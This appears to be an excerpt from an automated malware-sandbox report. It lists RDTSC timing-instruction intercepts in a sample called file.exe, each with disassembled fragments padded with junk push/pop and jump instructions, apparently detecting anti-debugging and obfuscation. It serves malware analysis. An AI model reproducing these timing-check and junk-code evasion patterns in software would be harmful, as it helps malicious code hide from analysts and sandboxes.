                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0569 second address: CC0571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0571 second address: CC0577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C79097 second address: C7909B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0814 second address: CC0849 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F885CC87018h 0x0000000c push edx 0x0000000d pop edx 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 jnp 00007F885CC87016h 0x00000017 pop ecx 0x00000018 jnc 00007F885CC8701Ch 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 jne 00007F885CC87016h 0x00000029 ja 00007F885CC87016h 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC0849 second address: CC084D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC084D second address: CC0853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC13C5 second address: CC13E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 jne 00007F885CB97C96h 0x0000000c push esi 0x0000000d pop esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F885CB97CA1h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC53DB second address: CC53FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 jo 00007F885CC87016h 0x0000000e jmp 00007F885CC8701Ah 0x00000013 pop edx 0x00000014 push edi 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 pushad 0x00000018 popad 0x00000019 pop edi 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC53FA second address: CC5407 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F885CB97C96h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4B82 second address: CC4B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4E21 second address: CC4E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4E27 second address: CC4E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F885CC87016h 0x0000000a popad 0x0000000b pop esi 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jno 00007F885CC87016h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC4E3C second address: CC4E40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC88CE second address: CC88D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8A1C second address: CC8A46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CB97CA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F885CB97CBBh 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F885CB97C9Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC8A46 second address: CC8A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0406 second address: CD040F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD040F second address: CD0419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F885CC87016h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0419 second address: CD0432 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CB97CA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD0432 second address: CD0448 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F885CC87018h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d pushad 0x0000000e jns 00007F885CC87016h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCE645 second address: CCE64B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCE64B second address: CCE655 instructions: 0x00000000 rdtsc 0x00000002 js 00007F885CC87016h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF513 second address: CCF51D instructions: 0x00000000 rdtsc 0x00000002 je 00007F885CB97C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF51D second address: CCF527 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F885CC8701Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF527 second address: CCF543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F885CB97C9Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F885CB97C96h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF543 second address: CCF547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCFAB1 second address: CCFAB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCFAB8 second address: CCFAC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD009F second address: CD00A9 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F885CB97C96h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD00A9 second address: CD00AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD00AF second address: CD00C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F885CB97C9Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD00C0 second address: CD00CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD00CE second address: CD00D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD00D2 second address: CD00EE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F885CC87020h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD00EE second address: CD00F8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F885CB97C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD00F8 second address: CD0109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CC8701Ch 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD586C second address: CD5897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CB97CA0h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F885CB97CA1h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD5897 second address: CD589F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD94B5 second address: CD94C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jng 00007F885CB97C96h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD94C7 second address: CD94CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD94CD second address: CD94D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F885CB97C96h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD86D3 second address: CD86FF instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F885CC87016h 0x00000008 jne 00007F885CC87016h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F885CC87022h 0x00000015 popad 0x00000016 jnl 00007F885CC8702Eh 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD86FF second address: CD8705 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD8705 second address: CD870E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD8AFB second address: CD8B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD8B01 second address: CD8B10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CC8701Ah 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD91BF second address: CD920A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CB97CA8h 0x00000009 push ecx 0x0000000a jmp 00007F885CB97CA4h 0x0000000f pop ecx 0x00000010 popad 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007F885CB97C96h 0x0000001a jmp 00007F885CB97C9Fh 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDEFA7 second address: CDEFAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF118 second address: CDF12F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 ja 00007F885CB97C9Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF12F second address: CDF133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF133 second address: CDF176 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jo 00007F885CB97C96h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jmp 00007F885CB97CA8h 0x00000014 jmp 00007F885CB97CA6h 0x00000019 popad 0x0000001a popad 0x0000001b push eax 0x0000001c push esi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF176 second address: CDF195 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F885CC87026h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF195 second address: CDF199 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF199 second address: CDF19F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF5B6 second address: CDF5BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF756 second address: CDF76A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F885CC87016h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF76A second address: CDF774 instructions: 0x00000000 rdtsc 0x00000002 js 00007F885CB97C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF774 second address: CDF77B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFA4E second address: CDFA8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CB97CA0h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F885CB97CA3h 0x0000000e jmp 00007F885CB97CA6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFBEB second address: CDFC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F885CC87016h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F885CC87025h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFD3A second address: CDFD44 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F885CB97C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE05D0 second address: CE05D6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0CBF second address: CE0CC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0CC5 second address: CE0CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F885CC8701Ch 0x0000000c jng 00007F885CC87016h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0CD7 second address: CE0CDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0CDD second address: CE0CE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB488 second address: CEB4B2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F885CB97C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b jnl 00007F885CB97CBFh 0x00000011 push edx 0x00000012 jmp 00007F885CB97C9Dh 0x00000017 jne 00007F885CB97C96h 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB4B2 second address: CEB4B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEB152 second address: CEB156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF38A6 second address: CF38C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007F885CC87016h 0x0000000c jmp 00007F885CC87027h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF38C9 second address: CF38E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F885CB97C9Eh 0x0000000e push edi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF38E5 second address: CF38EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF38EA second address: CF3923 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F885CB97C96h 0x00000009 jmp 00007F885CB97CA3h 0x0000000e jmp 00007F885CB97CA8h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3923 second address: CF3927 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFD84D second address: CFD853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFD853 second address: CFD864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CC8701Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFD864 second address: CFD868 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02660 second address: D0266B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0266B second address: D02671 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D06DC0 second address: D06DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D06DC6 second address: D06DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D06DCB second address: D06DD0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E365 second address: D0E36B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E36B second address: D0E37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F885CC8701Eh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E37F second address: D0E385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15ACA second address: D15AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F885CC87029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15AE7 second address: D15AED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15AED second address: D15AF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15DD1 second address: D15DF2 instructions: 0x00000000 rdtsc 0x00000002 je 00007F885CB97C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F885CB97C9Dh 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 ja 00007F885CB97C96h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15DF2 second address: D15E06 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F885CC87016h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F885CC87016h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D164D9 second address: D164DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D164DD second address: D164E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D164E3 second address: D164F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 je 00007F885CB97C96h 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16EC3 second address: D16EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F885CC87029h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19E1D second address: D19E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19A26 second address: D19A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CC87022h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1EF0C second address: D1EF2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F885CB97CADh 0x0000000b jmp 00007F885CB97CA7h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D32FDE second address: D32FE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47AF8 second address: D47AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47AFE second address: D47B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47B04 second address: D47B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F885CB97CA2h 0x00000009 popad 0x0000000a jno 00007F885CB97C98h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D47B23 second address: D47B28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D46B37 second address: D46B40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
